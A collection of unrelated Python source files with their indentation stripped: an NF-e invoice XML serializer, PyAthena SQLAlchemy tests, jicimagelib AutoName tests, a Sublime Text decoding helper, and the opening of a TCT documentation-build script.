etree.SubElement(endereco, 'fone').text = emitente.endereco_telefone
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_cliente(self, cliente, tag_raiz='dest', retorna_string=True):
raiz = etree.Element(tag_raiz)
# Dados do cliente
etree.SubElement(raiz, cliente.tipo_documento).text = so_numeros(cliente.numero_documento)
etree.SubElement(raiz, 'xNome').text = cliente.razao_social
etree.SubElement(raiz, 'IE').text = cliente.inscricao_estadual
# Endereço
endereco = etree.SubElement(raiz, 'enderDest')
etree.SubElement(endereco, 'xLgr').text = cliente.endereco_logradouro
etree.SubElement(endereco, 'nro').text = cliente.endereco_numero
etree.SubElement(endereco, 'xCpl').text = cliente.endereco_complemento
etree.SubElement(endereco, 'xBairro').text = cliente.endereco_bairro
etree.SubElement(endereco, 'cMun').text = cliente.endereco_municipio
etree.SubElement(endereco, 'xMun').text = obter_municipio_por_codigo(
cliente.endereco_municipio, cliente.endereco_uf,
)
etree.SubElement(endereco, 'UF').text = cliente.endereco_uf
etree.SubElement(endereco, 'CEP').text = so_numeros(cliente.endereco_cep)
etree.SubElement(endereco, 'cPais').text = cliente.endereco_pais
etree.SubElement(endereco, 'xPais').text = obter_pais_por_codigo(cliente.endereco_pais)
etree.SubElement(endereco, 'fone').text = cliente.endereco_telefone
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_transportadora(self, transportadora, tag_raiz='transporta', retorna_string=True):
raiz = etree.Element(tag_raiz)
# Dados da transportadora
etree.SubElement(raiz, transportadora.tipo_documento).text = so_numeros(transportadora.numero_documento)
etree.SubElement(raiz, 'xNome').text = transportadora.razao_social
etree.SubElement(raiz, 'IE').text = transportadora.inscricao_estadual
# Endereço
etree.SubElement(raiz, 'xEnder').text = transportadora.endereco_logradouro
etree.SubElement(raiz, 'cMun').text = transportadora.endereco_municipio
etree.SubElement(raiz, 'xMun').text = obter_municipio_por_codigo(
transportadora.endereco_municipio, transportadora.endereco_uf,
)
etree.SubElement(raiz, 'UF').text = transportadora.endereco_uf
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_entrega_retirada(self, entrega_retirada, tag_raiz='entrega', retorna_string=True):
raiz = etree.Element(tag_raiz)
# Dados da entrega/retirada
etree.SubElement(raiz, entrega_retirada.tipo_documento).text = so_numeros(entrega_retirada.numero_documento)
# Endereço
etree.SubElement(raiz, 'xLgr').text = entrega_retirada.endereco_logradouro
etree.SubElement(raiz, 'nro').text = entrega_retirada.endereco_numero
etree.SubElement(raiz, 'xCpl').text = entrega_retirada.endereco_complemento
etree.SubElement(raiz, 'xBairro').text = entrega_retirada.endereco_bairro
etree.SubElement(raiz, 'cMun').text = entrega_retirada.endereco_municipio
etree.SubElement(raiz, 'xMun').text = obter_municipio_por_codigo(
entrega_retirada.endereco_municipio, entrega_retirada.endereco_uf,
)
etree.SubElement(raiz, 'UF').text = entrega_retirada.endereco_uf
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_produto_servico(self, produto_servico, tag_raiz='det', retorna_string=True):
raiz = etree.Element(tag_raiz)
# Produto
prod = etree.SubElement(raiz, 'prod')
etree.SubElement(prod, 'cProd').text = str(produto_servico.codigo)
etree.SubElement(prod, 'cEAN').text = produto_servico.ean
etree.SubElement(prod, 'xProd').text = produto_servico.descricao
etree.SubElement(prod, 'CFOP').text = produto_servico.cfop
etree.SubElement(prod, 'uCom').text = produto_servico.unidade_comercial
etree.SubElement(prod, 'qCom').text = str(produto_servico.quantidade_comercial or 0)
etree.SubElement(prod, 'vUnCom').text = str(produto_servico.valor_unitario_comercial or 0)
etree.SubElement(prod, 'vProd').text = str(produto_servico.valor_total_bruto or 0)
etree.SubElement(prod, 'cEANTrib').text = produto_servico.ean_tributavel
etree.SubElement(prod, 'uTrib').text = produto_servico.unidade_tributavel
etree.SubElement(prod, 'qTrib').text = str(produto_servico.quantidade_tributavel)
etree.SubElement(prod, 'vUnTrib').text = str(produto_servico.valor_unitario_tributavel)
# Imposto
imposto = etree.SubElement(raiz, 'imposto')
icms = etree.SubElement(imposto, 'ICMS')
icms_item = etree.SubElement(icms, 'ICMS'+produto_servico.icms_situacao_tributaria)
etree.SubElement(icms_item, 'orig').text = str(produto_servico.icms_origem)
etree.SubElement(icms_item, 'CST').text = produto_servico.icms_situacao_tributaria
etree.SubElement(icms_item, 'modBC').text = str(produto_servico.icms_modalidade_determinacao_bc)
etree.SubElement(icms_item, 'vBC').text = str(produto_servico.icms_valor_base_calculo)
etree.SubElement(icms_item, 'pICMS').text = str(produto_servico.icms_aliquota)
etree.SubElement(icms_item, 'vICMS').text = str(produto_servico.icms_valor)
pis = etree.SubElement(imposto, 'PIS')
pis_item = etree.SubElement(pis, 'PISAliq')
etree.SubElement(pis_item, 'CST').text = str(produto_servico.pis_situacao_tributaria)
etree.SubElement(pis_item, 'vBC').text = str(produto_servico.pis_valor_base_calculo)
etree.SubElement(pis_item, 'pPIS').text = str(produto_servico.pis_aliquota_percentual)
etree.SubElement(pis_item, 'vPIS').text = str(produto_servico.pis_valor)
cofins = etree.SubElement(imposto, 'COFINS')
cofins_item = etree.SubElement(cofins, 'COFINSAliq')
etree.SubElement(cofins_item, 'CST').text = str(produto_servico.cofins_situacao_tributaria)
etree.SubElement(cofins_item, 'vBC').text = str(produto_servico.cofins_valor_base_calculo)
etree.SubElement(cofins_item, 'pCOFINS').text = str(produto_servico.cofins_aliquota_percentual)
etree.SubElement(cofins_item, 'vCOFINS').text = str(produto_servico.cofins_valor)
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def _serializar_notas_fiscal(self, nota_fiscal, tag_raiz='infNFe', retorna_string=True):
raiz = etree.Element(tag_raiz, versao=self._versao)
# Dados da Nota Fiscal
ide = etree.SubElement(raiz, 'ide')
etree.SubElement(ide, 'cUF').text = CODIGOS_ESTADOS[nota_fiscal.uf]
etree.SubElement(ide, 'cNF').text = nota_fiscal.codigo_numerico_aleatorio
etree.SubElement(ide, 'natOp').text = nota_fiscal.natureza_operacao
etree.SubElement(ide, 'indPag').text = str(nota_fiscal.forma_pagamento)
etree.SubElement(ide, 'mod').text = str(nota_fiscal.modelo)
etree.SubElement(ide, 'serie').text = nota_fiscal.serie
etree.SubElement(ide, 'nNF').text = str(nota_fiscal.numero_nf)
etree.SubElement(ide, 'dEmi').text = nota_fiscal.data_emissao.strftime('%Y-%m-%d')
etree.SubElement(ide, 'dSaiEnt').text = nota_fiscal.data_saida_entrada.strftime('%Y-%m-%d')
etree.SubElement(ide, 'tpNF').text = str(nota_fiscal.tipo_documento)
etree.SubElement(ide, 'cMunFG').text = nota_fiscal.municipio
etree.SubElement(ide, 'tpImp').text = str(nota_fiscal.tipo_impressao_danfe)
etree.SubElement(ide, 'tpEmis').text = str(nota_fiscal.forma_emissao)
etree.SubElement(ide, 'cDV').text = nota_fiscal.dv_codigo_numerico_aleatorio
etree.SubElement(ide, 'tpAmb').text = str(self._ambiente)
etree.SubElement(ide, 'finNFe').text = str(nota_fiscal.finalidade_emissao)
etree.SubElement(ide, 'procEmi').text = str(nota_fiscal.processo_emissao)
etree.SubElement(ide, 'verProc').text = '%s %s'%(self._nome_aplicacao,
nota_fiscal.versao_processo_emissao)
# Emitente
raiz.append(self._serializar_emitente(nota_fiscal.emitente, retorna_string=False))
# Destinatário
raiz.append(self._serializar_cliente(nota_fiscal.cliente, retorna_string=False))
# Retirada
if nota_fiscal.retirada:
raiz.append(self._serializar_entrega_retirada(
nota_fiscal.retirada,
retorna_string=False,
tag_raiz='retirada',
))
# Entrega
if nota_fiscal.entrega:
raiz.append(self._serializar_entrega_retirada(
nota_fiscal.entrega,
retorna_string=False,
tag_raiz='entrega',
))
# Itens
for num, item in enumerate(nota_fiscal.produtos_e_servicos):
det = self._serializar_produto_servico(item, retorna_string=False)
det.attrib['nItem'] = str(num+1)
raiz.append(det)
# Totais
total = etree.SubElement(raiz, 'total')
icms_total = etree.SubElement(total, 'ICMSTot')
etree.SubElement(icms_total, 'vBC').text = str(nota_fiscal.totais_icms_base_calculo)
etree.SubElement(icms_total, 'vICMS').text = str(nota_fiscal.totais_icms_total)
etree.SubElement(icms_total, 'vBCST').text = str(nota_fiscal.totais_icms_st_base_calculo)
etree.SubElement(icms_total, 'vST').text = str(nota_fiscal.totais_icms_st_total)
etree.SubElement(icms_total, 'vProd').text = str(nota_fiscal.totais_icms_total_produtos_e_servicos)
etree.SubElement(icms_total, 'vFrete').text = str(nota_fiscal.totais_icms_total_frete)
etree.SubElement(icms_total, 'vSeg').text = str(nota_fiscal.totais_icms_total_seguro)
etree.SubElement(icms_total, 'vDesc').text = str(nota_fiscal.totais_icms_total_desconto)
etree.SubElement(icms_total, 'vII').text = str(nota_fiscal.totais_icms_total_ii)
etree.SubElement(icms_total, 'vIPI').text = str(nota_fiscal.totais_icms_total_ipi)
etree.SubElement(icms_total, 'vPIS').text = str(nota_fiscal.totais_icms_pis)
etree.SubElement(icms_total, 'vCOFINS').text = str(nota_fiscal.totais_icms_cofins)
etree.SubElement(icms_total, 'vOutro').text = str(nota_fiscal.totais_icms_outras_despesas_acessorias)
etree.SubElement(icms_total, 'vNF').text = str(nota_fiscal.totais_icms_total_nota)
# Transporte
transp = etree.SubElement(raiz, 'transp')
etree.SubElement(transp, 'modFrete').text = str(nota_fiscal.transporte_modalidade_frete)
# Transportadora
transp.append(self._serializar_transportadora(
nota_fiscal.transporte_transportadora,
retorna_string=False,
))
# Veículo
veiculo = etree.SubElement(transp, 'veicTransp')
etree.SubElement(veiculo, 'placa').text = nota_fiscal.transporte_veiculo_placa
etree.SubElement(veiculo, 'UF').text = nota_fiscal.transporte_veiculo_uf
etree.SubElement(veiculo, 'RNTC').text = nota_fiscal.transporte_veiculo_rntc
# Reboque
reboque = etree.SubElement(transp, 'reboque')
etree.SubElement(reboque, 'placa').text = nota_fiscal.transporte_reboque_placa
etree.SubElement(reboque, 'UF').text = nota_fiscal.transporte_reboque_uf
etree.SubElement(reboque, 'RNTC').text = nota_fiscal.transporte_reboque_rntc
# Volumes
for volume in nota_fiscal.transporte_volumes:
vol = etree.SubElement(transp, 'vol')
etree.SubElement(vol, 'qVol').text = str(volume.quantidade)
etree.SubElement(vol, 'esp').text = volume.especie
etree.SubElement(vol, 'marca').text = volume.marca
etree.SubElement(vol, 'nVol').text = volume.numeracao
etree.SubElement(vol, 'pesoL').text = str(volume.peso_liquido)
etree.SubElement(vol, 'pesoB').text = str(volume.peso_bruto)
# Lacres
lacres = etree.SubElement(vol, 'lacres')
for lacre in volume.lacres:
etree.SubElement(lacres, 'nLacre').text = lacre.numero_lacre
# Informações adicionais
info_ad = etree.SubElement(raiz, 'infAdic')
etree.SubElement(info_ad, 'infAdFisco').text = nota_fiscal.informacoes_adicionais_interesse_fisco
etree.SubElement(info_ad, 'infCpl').text = nota_fiscal.informacoes_complementares_interesse_contribuinte
# 'Id' da tag raiz
# Ex.: NFe35080599999090910270550010000000011518005123
raiz.attrib['Id'] = nota_fiscal.identificador_unico
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
|
# -*- coding: utf-8 -*-
import re
import unittest
import uuid
from datetime import date, datetime
from decimal import Decimal
from urllib.parse import quote_plus
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy import String
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, MetaData, Table
from sqlalchemy.sql.sqltypes import (
BIGINT,
BINARY,
BOOLEAN,
DATE,
DECIMAL,
FLOAT,
INTEGER,
STRINGTYPE,
TIMESTAMP,
)
from tests.conftest import ENV, SCHEMA
from tests.util import with_engine
class TestSQLAlchemyAthena(unittest.TestCase):
"""Reference test case is following:
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py
"""
def create_engine(self, **kwargs):
conn_str = (
"awsathena+rest://athena.{region_name}.amazonaws.com:443/"
+ "{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}"
+ "&compression=snappy"
)
if "verify" in kwargs:
conn_str += "&verify={verify}"
if "duration_seconds" in kwargs:
conn_str += "&duration_seconds={duration_seconds}"
if "poll_interval" in kwargs:
conn_str += "&poll_interval={poll_interval}"
if "kill_on_interrupt" in kwargs:
conn_str += "&kill_on_interrupt={kill_on_interrupt}"
return create_engine(
conn_str.format(
region_name=ENV.region_name,
schema_name=SCHEMA,
s3_staging_dir=quote_plus(ENV.s3_staging_dir),
s3_dir=quote_plus(ENV.s3_staging_dir),
**kwargs
)
)
@with_engine()
def test_basic_query(self, engine, conn):
rows = conn.execute("SELECT * FROM one_row").fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].number_of_rows, 1)
self.assertEqual(len(rows[0]), 1)
@with_engine()
def test_reflect_no_such_table(self, engine, conn):
self.assertRaises(
NoSuchTableError,
lambda: Table("this_does_not_exist", MetaData(bind=engine), autoload=True),
)
self.assertRaises(
NoSuchTableError,
lambda: Table(
"this_does_not_exist",
MetaData(bind=engine),
schema="also_does_not_exist",
autoload=True,
),
)
@with_engine()
def test_reflect_table(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_with_schema(self, engine, conn):
one_row = Table("one_row", MetaData(bind=engine), schema=SCHEMA, autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_include_columns(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine))
version = float(
re.search(r"^([\d]+\.[\d]+)\..+", sqlalchemy.__version__).group(1)
)
if version <= 1.2:
engine.dialect.reflecttable(
conn, one_row_complex, include_columns=["col_int"], exclude_columns=[]
)
elif version == 1.3:
# https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html
# #change-64ac776996da1a5c3e3460b4c0f0b257
engine.dialect.reflecttable(
conn,
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
else: # version >= 1.4
# https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html
# #change-0215fae622c01f9409eb1ba2754f4792
# https://docs.sqlalchemy.org/en/14/core/reflection.html
# #sqlalchemy.engine.reflection.Inspector.reflect_table
insp = sqlalchemy.inspect(engine)
insp.reflect_table(
one_row_complex,
include_columns=["col_int"],
exclude_columns=[],
resolve_fks=True,
)
self.assertEqual(len(one_row_complex.c), 1)
self.assertIsNotNone(one_row_complex.c.col_int)
self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)
@with_engine()
def test_unicode(self, engine, conn):
unicode_str = "密林"
one_row = Table("one_row", MetaData(bind=engine))
returned_str = sqlalchemy.select(
[expression.bindparam("あまぞん", unicode_str, type_=String())],
from_obj=one_row,
).scalar()
self.assertEqual(returned_str, unicode_str)
@with_engine()
def test_reflect_schemas(self, engine, conn):
insp = sqlalchemy.inspect(engine)
schemas = insp.get_schema_names()
self.assertIn(SCHEMA, schemas)
self.assertIn("default", schemas)
@with_engine()
def test_get_table_names(self, engine, conn):
meta = MetaData()
meta.reflect(bind=engine)
print(meta.tables)
self.assertIn("one_row", meta.tables)
self.assertIn("one_row_complex", meta.tables)
insp = sqlalchemy.inspect(engine)
self.assertIn(
"many_rows",
insp.get_table_names(schema=SCHEMA),
)
@with_engine()
def test_has_table(self, engine, conn):
insp = sqlalchemy.inspect(engine)
self.assertTrue(insp.has_table("one_row", schema=SCHEMA))
self.assertFalse(insp.has_table("this_table_does_not_exist", schema=SCHEMA))
@with_engine()
def test_get_columns(self, engine, conn):
insp = sqlalchemy.inspect(engine)
actual = insp.get_columns(table_name="one_row", schema=SCHEMA)[0]
self.assertEqual(actual["name"], "number_of_rows")
self.assertTrue(isinstance(actual["type"], INTEGER))
self.assertTrue(actual["nullable"])
self.assertIsNone(actual["default"])
self.assertEqual(actual["ordinal_position"], 1)
self.assertIsNone(actual["comment"])
@with_engine()
def test_char_length(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
result = (
sqlalchemy.select(
[sqlalchemy.func.char_length(one_row_complex.c.col_string)]
)
.execute()
.scalar()
)
self.assertEqual(result, len("a string"))
@with_engine()
def test_reflect_select(self, engine, conn):
one_row_complex = Table("one_row_complex", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row_complex.c), 15)
self.assertIsInstance(one_row_complex.c.col_string, Column)
rows = one_row_complex.select().execute().fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(
list(rows[0]),
[
True,
127,
32767,
2147483647,
9223372036854775807,
0.5,
0.25,
"a string",
datetime(2017, 1, 1, 0, 0, 0),
date(2017, 1, 2),
b"123",
"[1, 2]",
"{1=2, 3=4}",
"{a=1, b=2}",
Decimal("0.1"),
],
)
self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)
self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)
self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)
self.assertIsInstance(one_row_complex.c.col_date.type, DATE)
self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)
self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)
@with_engine()
def test_reserved_words(self, engine, conn):
"""Presto uses double quotes, not backticks"""
fake_table = Table(
"select", MetaData(bind=engine), Column("current_timestamp", STRINGTYPE)
)
query = str(fake_table.select(fake_table.c.current_timestamp == "a"))
self.assertIn('"select"', query)
self.assertIn('"current_timestamp"', query)
self.assertNotIn("`select`", query)
self.assertNotIn("`current_timestamp`", query)
@with_engine()
def test_retry_if_data_catalog_exception(self, engine, conn):
dialect = engine.dialect
exc = OperationalError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Namespace does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError(
"", None, "Table does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
exc = OperationalError("", None, "foobar.")
self.assertTrue(
dialect._retry_if_data_catalog_exception(exc, "foobar", "foobar")
)
exc = ProgrammingError(
"", None, "Database does_not_exist not found. Please check your query."
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "does_not_exist", "this_does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "does_not_exist"
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, "this_does_not_exist", "this_does_not_exist"
)
)
@with_engine()
def test_get_column_type(self, engine, conn):
dialect = engine.dialect
self.assertEqual(dialect._get_column_type("boolean"), "boolean")
self.assertEqual(dialect._get_column_type("tinyint"), "tinyint")
self.assertEqual(dialect._get_column_type("smallint"), "smallint")
self.assertEqual(dialect._get_column_type("integer"), "integer")
self.assertEqual(dialect._get_column_type("bigint"), "bigint")
self.assertEqual(dialect._get_column_type("real"), "real")
self.assertEqual(dialect._get_column_type("double"), "double")
self.assertEqual(dialect._get_column_type("varchar"), "varchar")
self.assertEqual(dialect._get_column_type("timestamp"), "timestamp")
self.assertEqual(dialect._get_column_type("date"), "date")
self.assertEqual(dialect._get_column_type("varbinary"), "varbinary")
self.assertEqual(dialect._get_column_type("array(integer)"), "array")
self.assertEqual(dialect._get_column_type("map(integer, integer)"), "map")
self.assertEqual(dialect._get_column_type("row(a integer, b integer)"), "row")
self.assertEqual(dialect._get_column_type("decimal(10,1)"), "decimal")
@with_engine()
def test_contain_percents_character_query(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d')
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query)
self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])
query_with_limit = (
sqlalchemy.sql.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit)
self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])
@with_engine()
def test_query_with_parameter(self, engine, conn):
select = sqlalchemy.sql.text(
"""
SELECT :word
"""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select(["*"]).select_from(table_expression)
result = engine.execute(query, word="cat")
self.assertEqual(result.fetchall(), [("cat",)])
query_with_limit = (
sqlalchemy.select(["*"]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit, word="cat")
self.assertEqual(result_with_limit.fetchall(), [("cat",)])
@with_engine()
def test_contain_percents_character_query_with_parameter(self, engine, conn):
select1 = sqlalchemy.sql.text(
"""
SELECT date_parse('20191030', '%Y%m%d'), :word
"""
)
table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()
query1 = sqlalchemy.select(["*"]).select_from(table_expression1)
result1 = engine.execute(query1, word="cat")
self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), "cat")])
query_with_limit1 = (
sqlalchemy.select(["*"]).select_from(table_expression1).limit(1)
)
result_with_limit1 = engine.execute(query_with_limit1, word="cat")
self.assertEqual(
result_with_limit1.fetchall(), [(datetime(2019, 10, 30), "cat")]
)
select2 = sqlalchemy.sql.text(
"""
SELECT col_string, :param FROM one_row_complex
WHERE col_string LIKE 'a%' OR col_string LIKE :param
"""
)
table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()
query2 = sqlalchemy.select(["*"]).select_from(table_expression2)
result2 = engine.execute(query2, param="b%")
self.assertEqual(result2.fetchall(), [("a string", "b%")])
query_with_limit2 = (
sqlalchemy.select(["*"]).select_from(table_expression2).limit(1)
)
result_with_limit2 = engine.execute(query_with_limit2, param="b%")
self.assertEqual(result_with_limit2.fetchall(), [("a string", "b%")])
@with_engine()
def test_nan_checks(self, engine, conn):
dialect = engine.dialect
self.assertFalse(dialect._is_nan("string"))
self.assertFalse(dialect._is_nan(1))
self.assertTrue(dialect._is_nan(float("nan")))
@with_engine()
def test_to_sql(self, engine, conn):
# TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:
# Column 'foobar' cannot be resolved.
# def _format_bytes(formatter, escaper, val):
# return val.decode()
table_name = "to_sql_{0}".format(str(uuid.uuid4()).replace("-", ""))
df = pd.DataFrame(
{
"col_int": np.int32([1]),
"col_bigint": np.int64([12345]),
"col_float": np.float32([1.0]),
"col_double": np.float64([1.2345]),
"col_string": ["a"],
"col_boolean": np.bool_([True]),
"col_timestamp": [datetime(2020, 1, 1, 0, 0, 0)],
"col_date": [date(2020, 12, 31)],
# "col_binary": "foobar".encode(),
}
)
# Explicitly specify column order
df = df[
[
"col_int",
"col_bigint",
"col_float",
"col_double",
"col_string",
"col_boolean",
"col_timestamp",
"col_date",
# "col_binary",
]
]
df.to_sql(
table_name,
engine,
schema=SCHEMA,
index=False,
if_exists="replace",
method="multi",
)
table = Table(table_name, MetaData(bind=engine), autoload=True)
self.assertEqual(
table.select().execute().fetchall(),
[
(
1,
12345,
1.0,
1.2345,
"a",
True,
datetime(2020, 1, 1, 0, 0, 0),
date(2020, 12, 31),
# "foobar".encode(),
)
],
)
@with_engine(verify="false")
def test_conn_str_verify(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertFalse(kwargs["verify"])
@with_engine(duration_seconds="1800")
def test_conn_str_duration_seconds(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertEqual(kwargs["duration_seconds"], 1800)
@with_engine(poll_interval="5")
def test_conn_str_poll_interval(self, engine, conn):
self.assertEqual(conn.connection.poll_interval, 5)
@with_engine(kill_on_interrupt="false")
def test_conn_str_kill_on_interrupt(self, engine, conn):
self.assertFalse(conn.connection.kill_on_interrupt)
|
"""Tests for the :class:`jicimagelib.io.AutoName` class."""
import unittest
class AutoNameTests(unittest.TestCase):
def test_import_AutoName_class(self):
# This throws an error if the class cannot be imported.
from jicimagelib.io import AutoName
def test_count(self):
from jicimagelib.io import AutoName
self.assertEqual(AutoName.count, 0)
def test_directory(self):
from jicimagelib.io import AutoName
self.assertEqual(AutoName.directory, None)
def test_suffix(self):
from jicimagelib.io import AutoName
self.assertEqual(AutoName.suffix, '.png')
def test_name_callable(self):
from jicimagelib.io import AutoName
self.assertTrue(callable(AutoName.name))
def test_name_logic(self):
from jicimagelib.io import AutoName
def no_transform(image):
return image
self.assertEqual(AutoName.name(no_transform), '1_no_transform.png')
AutoName.directory = '/tmp'
self.assertEqual(AutoName.name(no_transform), '/tmp/2_no_transform.png')
if __name__ == '__main__':
unittest.main()
|
import sublime
import sys
import re
class CrossPlaformCodecs():
@classmethod
def decode_line(self, line):
line = line.rstrip()
decoded_line = self.force_decode(line) if sys.version_info >= (3, 0) else line
decoded_line = re.sub(r'\033\[(\d{1,2}m|\d\w)', '', str(decoded_line))
return decoded_line + "\n"
@classmethod
def force_decode(self, text):
try:
text = text.decode('utf-8')
except UnicodeDecodeError:
if sublime.platform() == "windows":
text = self.decode_windows_line(text)
return text
@classmethod
def decode_windows_line(self, text):
# Import only for Windows
import locale, subprocess
# STDERR gets the wrong encoding, use chcp to get the real one
proccess = subprocess.Popen(["chcp"], shell=True, stdout=subprocess.PIPE)
(chcp, _) = proccess.communicate()
# Decode using the locale preferred encoding (for example 'cp1251') and remove newlines
chcp = chcp.decode(locale.getpreferredencoding()).strip()
# Get the actual number
chcp = chcp.split(" ")[-1]
# Actually decode
return text.decode("cp" + chcp)
@classmethod
def encode_process_command(self, command):
is_sublime_2_and_in_windows = sublime.platform() == "windows" and int(sublime.version()) < 3000
return command.encode(sys.getfilesystemencoding()) if is_sublime_2_and_in_windows else command
|
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
from __future__ import absolute_import
import codecs
import glob
import json
import os
import re
import six
import sys
import tct
from os.path import join as ospj
from tct import deepget
params = tct.readjson(sys.argv[1])
binabspath = sys.argv[2]
facts = tct.readjson(params['factsfile'])
milestones = tct.readjson(params['milestonesfile'])
reason = ''
resultfile = params['resultfile']
result = tct.readjson(resultfile)
loglist = result['loglist'] = result.get('loglist', [])
toolname = params['toolname']
toolname_pure = params['toolname_pure']
workdir = params['workdir']
exitcode = CONTINUE = 0
# ==================================================
# Make a copy of milestones for later inspection?
# --------------------------------------------------
if 0 or milestones.get('debug_always_make_milestones_snapshot'):
tct.make_snapshot_of_milestones(params['milestonesfile'], sys.argv[1])
# ==================================================
# Helper functions
# --------------------------------------------------
def lookup(D, *keys, **kwdargs):
result = deepget(D, *keys, **kwdargs)
loglist.append((keys, result))
return result
# ==================================================
# define
# --------------------------------------------------
theme_info = None
theme_info_json_file = None
theme_module_path = None
xeq_name_cnt = 0
# ==================================================
# Check params
# --------------------------------------------------
if exitcode == CONTINUE:
loglist.append('CHECK PARAMS')
build_html_folder = lookup(milestones, 'build_html_folder')
if not (1
and build_html_folder
and 1):
CONTINUE = -2
reason = 'Bad PARAMS or nothing to do'
if exitcode == CONTINUE:
loglist.append('PARAMS are ok')
else:
loglist.append(reason)
# ==================================================
# work
# --------------------------------------------------
if exitcode == CONTINUE:
f1path = os.path.join(build_html_folder, '_static/_version_info_GENERATED.json')
if not os.path.exists(f1path):
CONTINUE = -2
reason = "'_static/_version_info_GENERATED.json' not found"
if exitcode == CONTINUE:
with open(f1path) as f1:
theme_info = json.load(f1)
theme_info_json_file = f1path
theme_module = __import__(theme_info['module_name'])
theme_module_path = ospj(theme_module.get_html_theme_path(), theme_info['module_name'])
# ==================================================
# Set MILESTONE
